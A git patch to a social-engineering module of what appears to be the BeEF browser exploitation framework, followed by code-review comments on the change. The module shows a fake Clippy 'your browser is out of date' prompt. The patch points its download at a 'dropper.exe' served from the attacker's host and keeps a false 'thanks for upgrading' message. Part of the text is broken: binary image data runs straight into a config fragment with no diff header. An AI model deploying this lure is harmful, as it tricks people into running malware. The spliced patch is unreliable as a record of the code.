From 13428e6ff7c051172eb2cadb8fc9f76200ccc774 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 18 Jul 2015 06:48:10 +0000
Subject: [PATCH] Host clippy images locally
---
.../clippy/assets/README.txt | 2 ++
.../clippy/assets/clippy-main.png | Bin 0 -> 2753 bytes
.../clippy/assets/clippy-speech-bottom.png | Bin 0 -> 238 bytes
.../clippy/assets/clippy-speech-mid.png | Bin 0 -> 142 bytes
.../clippy/assets/clippy-speech-top.png | Bin 0 -> 185 bytes
modules/social_engineering/clippy/config.yaml | 2 +-
modules/social_engineering/clippy/module.rb | 21 ++++++++++++++++--
7 files changed, 22 insertions(+), 3 deletions(-)
create mode 100644 modules/social_engineering/clippy/assets/README.txt
create mode 100644 modules/social_engineering/clippy/assets/clippy-main.png
create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-bottom.png
create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-mid.png
create mode 100644 modules/social_engineering/clippy/assets/clippy-speech-top.png
diff --git a/modules/social_engineering/clippy/assets/README.txt b/modules/social_engineering/clippy/assets/README.txt
new file mode 100644
index 000000000..9fe306ab3
--- /dev/null
+++ b/modules/social_engineering/clippy/assets/README.txt
@@ -0,0 +1,2 @@
+heretic-clippy is copyright (c) 2013 sprky0
+Homepage: https://github.com/sprky0/heretic-clippy
diff --git a/modules/social_engineering/clippy/assets/clippy-main.png b/modules/social_engineering/clippy/assets/clippy-main.png new file mode 100644 index 0000000000000000000000000000000000000000..89327c614c1d096fb4ace45c6b04a7084eb30a67 GIT binary patch literal 2753 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 literal 0 HcmV?d00001 diff --git a/modules/social_engineering/clippy/assets/clippy-speech-mid.png b/modules/social_engineering/clippy/assets/clippy-speech-mid.png new file mode 100644 index 0000000000000000000000000000000000000000..bde639834a74993704201ceaff5580718cfb4a6d GIT binary patch literal 142 zcmeAS@N?(olHy`uVBq!ia0vp^O+d`W!3-q*?aHcvlw^r(L`iUdT1k0gQ7VIDN`6wR zf@f}GdTLN=VoGJ<$y6JlBDMgZ5LY1m|Nj{&&VQ$YEICgX$B>F!NeKxu2?q`sylM$l k@3Bg}!r6SDlYxzopr02;L^2LJ#7 literal 0 HcmV?d00001 diff --git a/modules/social_engineering/clippy/assets/clippy-speech-top.png b/modules/social_engineering/clippy/assets/clippy-speech-top.png new file mode 100644 index 0000000000000000000000000000000000000000..b1192cf09eab5c646b5bffe3150b0cc5b4bbc39e GIT binary patch literal 185 zcmeAS@N?(olHy`uVBq!ia0vp^O+d`S!3-pszFjW_Qj#UE5hcO-X(i=}MX3yqDfvmM z3ZA)%>8U}fi7AzZCsS>JiZ}y&LR^9L|Nm$H|NlSn*(V(!hq)xkFZlm|hU=$z9f4eP zPZ!6Kid$#SHS#hj@Gu=b{3^AVnLAE1(BY{RR`M4Lw`3r e%swERz;Ny$^YW;J@_&FvFnGH9xvX
You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt." authors: ["vt [nick.freeman@security-assessment.com]", "denden [denis.andzakovic@security-assessment.com]"] target: user_notify: ['ALL']
diff --git a/modules/social_engineering/clippy/module.rb b/modules/social_engineering/clippy/module.rb
index 5cc650861..2476530cc 100755
--- a/modules/social_engineering/clippy/module.rb
+++ b/modules/social_engineering/clippy/module.rb
@@ -4,12 +4,25 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Clippy < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-bottom.png','/clippy/clippy-speech-bottom','png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-mid.png','/clippy/clippy-speech-mid','png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-speech-top.png','/clippy/clippy-speech-top','png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/clippy/assets/clippy-main.png','/clippy/clippy-main','png')
+ end
 
 def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+ base_host = "#{proto}://#{beef_host}:#{beef_port}"
+
 return [
- {'name' =>'clippydir', 'description' =>'Webdir containing clippy image', 'ui_label'=>'Clippy image', 'value' => 'http://clippy.ajbnet.com/1.0.0/'},
+ {'name' =>'clippydir', 'description' =>'Webdir containing clippy images', 'ui_label'=>'Clippy image directory', 'value' => "#{base_host}/clippy/"},
 {'name' =>'askusertext', 'description' =>'Text for speech bubble', 'ui_label'=>'Custom text', 'value' => 'Your browser appears to be out of date.
Would you like to upgrade it?'},
- {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'},
+ {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => "#{base_host}/dropper.exe"},
 {'name' =>'respawntime', 'description' =>'', 'ui_label'=>'Time until Clippy shows his face again', 'value' => '5000'},
 {'name' =>'thankyoumessage', 'description' =>'Thankyou message after downloading', 'ui_label'=>'Thankyou message after downloading', 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!'}
 ]
@@ -21,6 +34,10 @@ class Clippy < BeEF::Core::Command
 #
 def post_execute
 save({'answer' => @datastore['answer']})
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-main.png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-top.png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-mid.png')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/clippy/clippy-speech-bottom.png')
 end
 
 end
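Review bot: The four `bind` calls in `pre_send` repeat the same fully qualified receiver and asset directory, and the matching `unbind` calls in the `post_execute` hunk spell the same routes in a different form (`/clippy/clippy-main.png` there, `/clippy/clippy-main` plus `'png'` here), so the two lists can drift apart unnoticed. Keeping the asset names in one frozen constant and looping over it, as below, leaves a single place to edit, and the same constant could drive the teardown. In `self.options`, `@configuration` is set as an instance variable on the class although it is only read inside this method, so a local would do. The body of `self.options` ends outside the hunk.

```ruby
  CLIPPY_ASSETS = %w[clippy-speech-bottom clippy-speech-mid clippy-speech-top clippy-main].freeze

  def pre_send
    handler = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance
    CLIPPY_ASSETS.each do |name|
      handler.bind("/modules/social_engineering/clippy/assets/#{name}.png", "/clippy/#{name}", 'png')
    end
  end

  # … unchanged: self.options …
```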
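Review bot: The teardown added to `post_execute` does not mirror the setup in `pre_send`: the routes are mounted on the shared `AssetHandler.instance`, but they are removed whenever this method runs, which is presumably once per returned result rather than once per command. A later call would then unbind routes that are already gone (whether `unbind` tolerates an unknown path is not visible here), and if no result ever arrives the four files stay mounted on the framework's web server. At minimum the method should say so, e.g. `# Asset routes are process-wide; this removes them on the first result received.`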